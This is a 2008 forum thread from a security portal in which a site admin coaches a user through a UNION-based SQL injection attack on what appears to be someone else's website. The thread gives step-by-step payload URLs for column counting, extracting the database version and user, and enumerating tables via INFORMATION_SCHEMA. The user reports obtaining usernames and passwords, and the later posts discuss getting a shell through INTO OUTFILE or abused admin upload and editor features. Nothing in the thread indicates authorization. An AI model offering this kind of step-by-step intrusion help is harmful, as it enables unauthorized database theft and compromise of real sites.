 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
hwo do i go forward ? |
 |
 Posted: Tue Feb 19, 2008 9:45 pm |
 |
|
| theface |
| Active user |
 |
|
| Joined: Dec 24, 2007 |
| Posts: 33 |
|
|
|
 |
|
 |
|
ok i have found a buig in this
http://www.site.com/details.php?id=-1'
| Code: | | You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' && publish = '1' ORDER BY id DESC LIMIT 0, 100' at line 1 |
how do i get to admin are using this ? ? |
|
|
|
|
| Posted: Tue Feb 19, 2008 10:06 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Step by step.
First, you don't need single quotes here:
| Code: |
http://www.site.com/details.php?id=-1+OR
|
... and you will get error message.
Next:
| Code: |
http://www.site.com/details.php?id=-1--+
|
no error message?
Now try this:
| Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1--+
|
Got error message? About wrong columns count? |
|
|
|
|
| Posted: Tue Feb 19, 2008 10:12 pm |
|
|
| theface |
| Active user |
|
|
| Joined: Dec 24, 2007 |
| Posts: 33 |
|
|
|
|
|
|
|
| yeah its going exactly the way you told. but how i get teh admin login ? |
|
|
|
|
| Posted: Tue Feb 19, 2008 10:24 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| theface wrote: | | yeah its going exactly the way you told. but how i get teh admin login ? |
Where is your patience 
Try this:
| Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2--+
|
| Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3--+
|
| Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5--+
|
Now repeat UNION tests with increased columns count. Till you will get no errors or error message will be diferent. In that moment you will get to know needed column count. Post it here. |
|
|
|
|
| Posted: Tue Feb 19, 2008 10:44 pm |
|
|
| theface |
| Active user |
|
|
| Joined: Dec 24, 2007 |
| Posts: 33 |
|
|
|
|
|
|
|
| Code: | | http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6--+ |
i am geting a blank page with
|
|
|
|
|
| Posted: Tue Feb 19, 2008 11:07 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Next:
| Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,@@version,6--+
|
| Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,USER(),6--+
|
| Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,DATABASE(),6--+
|
| Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,COUNT(*),6+FROM+mysql.user--+
|
Post here mysql version. And let me know, if "Access denied" appears in last test. |
|
|
|
|
| Posted: Tue Feb 19, 2008 11:13 pm |
|
|
| theface |
| Active user |
|
|
| Joined: Dec 24, 2007 |
| Posts: 33 |
|
|
|
|
|
|
|
Version 5.0.45
| Code: | | SELECT command denied to user 's4ngUCMs88'@'*6*****' for table 'user' |
|
|
|
|
|
|
|
|
|
| Posted: Tue Feb 19, 2008 11:39 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
This is mysql version 5.x, so you can use INFORMATION_SCHEMA database for insider look.
| Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,TABLE_NAME,6+FROM+INFORMATION_SCHEMA.TABLES--+
|
Do you see one table name entry or multiple?
If it's only one entry, then use LIMIT:
| Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,COUNT(TABLE_NAME),6+FROM+INFORMATION_SCHEMA.TABLES--+
|
... will give you count of all table names
| Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,TABLE_NAME,6+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1--+
|
| Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,TABLE_NAME,6+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1--+
|
| Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,TABLE_NAME,6+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+20,1--+
|
Look for interesting table names - user, admin, people, accounts, staff, logins, etc ... |
|
|
|
|
|
|
|
|
| Posted: Tue Feb 19, 2008 11:57 pm |
|
|
| theface |
| Active user |
|
|
| Joined: Dec 24, 2007 |
| Posts: 33 |
|
|
|
|
|
|
|
ok i have got the tabels and users and its apsses as well
is there anyway i can inject a shell ? |
|
|
|
|
| Posted: Wed Feb 20, 2008 10:46 am |
|
|
| theface |
| Active user |
|
|
| Joined: Dec 24, 2007 |
| Posts: 33 |
|
|
|
|
|
|
|
| any help about the Shell injection waraxe? |
|
|
|
|
| Posted: Wed Feb 20, 2008 10:56 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| theface wrote: | ok i have got the tabels and users and its apsses as well
is there anyway i can inject a shell ? |
Only direct way from Mysql database to file system is INTO OUTFILE. And it works only if currently logged in Mysql user has FILE privileges. Probably you don't have FILE privs. So you must find other methods to get php code execution level access.
Is there admin interface? Did you get admin credentials? Can you log in as admin? Admin interface MAY contain insecure functionality, which can be used for php code injection. Example - template or file editors, file uploads, ... |
|
|
|
|
| Posted: Wed Feb 20, 2008 11:02 am |
|
|
| theface |
| Active user |
|
|
| Joined: Dec 24, 2007 |
| Posts: 33 |
|
|
|
|
|
|
|
i am unable to login to admin as i am unable to find teh login page  |
|
|
|
|
| Posted: Wed Feb 20, 2008 1:01 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 53
Members: 0
Total: 53
